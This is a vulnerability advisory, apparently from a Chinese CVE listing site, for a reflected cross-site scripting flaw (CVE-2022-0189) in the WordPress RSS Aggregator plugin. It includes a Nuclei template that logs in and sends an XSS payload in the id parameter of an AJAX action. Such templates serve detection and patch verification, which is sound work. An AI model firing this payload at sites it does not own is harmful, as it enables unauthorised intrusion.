CVE-2022-0189: WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting

日期: 2025-08-01 | 影响软件: WordPress RSS Aggregator | POC: 已公开

漏洞描述

WordPress RSS Aggregator < 4.20 is susceptible to cross-site scripting. The plugin does not sanitize and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to reflected cross-site scripting.

PoC代码[已公开]

id: CVE-2022-0189

info:
  name: WordPress RSS Aggregator < 4.20 - Authenticated Cross-Site Scripting
  author: DhiyaneshDK
  severity: medium
  description: WordPress RSS Aggregator < 4.20 is susceptible to cross-site scripting. The plugin does not sanitize and escape the id parameter in the wprss_fetch_items_row_action AJAX action before outputting it back in the response, leading to reflected cross-site scripting.
  impact: |
    An attacker with authenticated access can inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information.
  remediation: |
    Update WordPress RSS Aggregator plugin to version 4.20 or later to mitigate the vulnerability.
  reference:
    - https://wpscan.com/vulnerability/52a71bf1-b8bc-479e-b741-eb8fb9685014
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0189
    - https://plugins.trac.wordpress.org/changeset/2659298
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-0189
    cwe-id: CWE-79
    epss-score: 0.02778
    epss-percentile: 0.85545
    cpe: cpe:2.3:a:wprssaggregator:wp_rss_aggregator:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 2
    vendor: wprssaggregator
    product: wp_rss_aggregator
    framework: wordpress
  tags: cve,cve2022,wpscan,wordpress,xss,wp-plugin,authenticated,wprssaggregator

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Origin: {{RootURL}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
      - |
        POST /wp-admin/admin-ajax.php?action=wprss_fetch_items_row_action HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
        Cookie: wordpress_test_cookie=WP%20Cookie%20check

        id=%3Chtml%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29%3E

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "<img src onerror=alert(`document.domain`)>"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a0047304502210082ee694cd8c987ee195902b08f1a658351ae7b3d032984c60fbcba5d4bfbc570022072c7b68ba40c6def48ec4c66a4d2fca67d8545d547af4ebd1feeebd04b83c889:922c64590222798bb761d5b6d8e72950